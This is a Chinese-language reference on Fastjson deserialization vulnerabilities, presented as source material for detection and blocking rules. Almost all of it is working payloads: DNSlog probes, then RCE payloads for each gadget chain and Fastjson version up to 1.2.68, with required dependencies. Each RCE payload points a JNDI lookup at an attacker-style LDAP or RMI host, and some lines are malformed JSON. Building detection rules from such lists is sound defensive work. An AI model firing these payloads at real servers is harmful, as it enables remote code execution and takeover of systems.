Fastjson漏洞利用代码分析(检测规则参考)
截止2020年8月21日,根据公开信息,Fastjson <=1.2.68版本均可能存在严重漏洞。
以下是fastjson漏洞的利用代码,可作为参考,进行检测规则的升级
Fastjson漏洞的利用代码
以下漏洞利用代码可用于探测后端是否使用了fastjson,是攻击者打点入侵的前兆,建议做【检测】处理(其中:dnslog往往是外部的域名或链接),每一行的json都是一个可能有效的payload
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
以下漏洞利用代码被服务端成功解析后,会导致远程命令执行,危害极大,建议做【封禁】处理。
注意:下文中,RCE代表Remote Code Execution(远程代码执行)
HadoopHikari RCE(<= 1.2.68)
fastjson <= 1.2.68 RCE,需要开启 AutoType 依赖库:
<dependency>
<groupId>org.apache.hadoop</groupId>
<artifactId>hadoop-client-minicluster</artifactId>
<version>3.2.1</version>
</dependency>
漏洞利用代码
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://[evil]/Calc"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://[evil]/1pndqv"}
Shiro RCE(<= 1.2.66)(高频率)
fastjson <= 1.2.66 RCE,需要开启 AutoType
依赖shiro-core,即
<dependency>
<groupId>org.apache.shiro</groupId>
<artifactId>shiro-core</artifactId>
</dependency>
漏洞利用代码
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:43658/Calc"], "Realms":[""]}
JndiConverter RCE(<= 1.2.62)
fastjson 版本小于<= 1.2.62 RCE,需要开启AutoType,且依赖XBean-reflect ,即
<dependency>
<groupId>org.apache.xbean</groupId>
<artifactId>xbean-reflect</artifactId>
</dependency>
漏洞利用代码
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://localhost:43658/Calc"}
IbatisSqlmap RCE(<= 1.2.62)
fastjson <= 1.2.62 RCE,需要开启AutoType,且需要如下依赖
<dependency>
<groupId>org.apache.ibatis</groupId>
<artifactId>ibatis-sqlmap</artifactId>
<version>2.3.4.726</version>
</dependency>
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-api</artifactId>
<version>8.0.1</version>
</dependency>
漏洞利用代码
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://localhost:43658/Calc"}}
CocoonSlide RCE(<= 1.2.62)
fastjson <= 1.2.62 RCE,需要开启AutoType,且因为引用了javax/jms/JMSException类,所以必须在javaee环境下,需要如下依赖
<dependency>
<groupId>slide</groupId>
<artifactId>slide-kernel</artifactId>
<version>2.1</version>
</dependency>
<dependency>
<groupId>cocoon</groupId>
<artifactId>cocoon-slide</artifactId>
<version>2.1.11</version>
</dependency>
漏洞利用代码
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://127.0.0.1:43658/Calc"}, "namespace":""}
Anteros RCE(<=1.2.62)
fastjson <= 1.2.62 RCE,需要开启 AutoType,且需要如下依赖
<dependency>
<groupId>com.codahale.metrics</groupId>
<artifactId>metrics-healthchecks</artifactId>
<version>3.0.2</version>
</dependency>
<dependency>
<groupId>br.com.anteros</groupId>
<artifactId>Anteros-Core</artifactId>
<version>1.2.1</version>
</dependency>
<dependency>
<groupId>br.com.anteros</groupId>
<artifactId>Anteros-DBCP</artifactId>
<version>1.0.1</version>
</dependency>
漏洞利用代码
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:43658/Calc"}
CommonsProxy RCE(<=1.2.61)
CommonsProxy fastjson <= 1.2.61 RCE,需要开启AutoType,需要如下依赖
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-proxy</artifactId>
</dependency>
漏洞利用代码
{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:43658/Calc","Object":"a"}
HikariConfig RCE(<=1.2.59)
fastjson <= 1.2.59 RCE,需要开启 AutoType,需要如下依赖
<dependency>
<groupId>com.zaxxer</groupId>
<artifactId>HikariCP</artifactId>
</dependency>
漏洞利用代码
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:43658/Calc"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:43658/Calc"}
JdbcRowSetImpl RCE(<= 1.2.48)(常用)
fastjson 1.2.48 以下不需要任何配置或依赖,默认配置通杀 RCE
漏洞利用代码
[{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:43658/Calc","autoCommit":true}]
1.2.47以下版本漏洞利用代码
版本 Payload
1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
未知版本(1.2.24-41之间)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};
1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}
1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}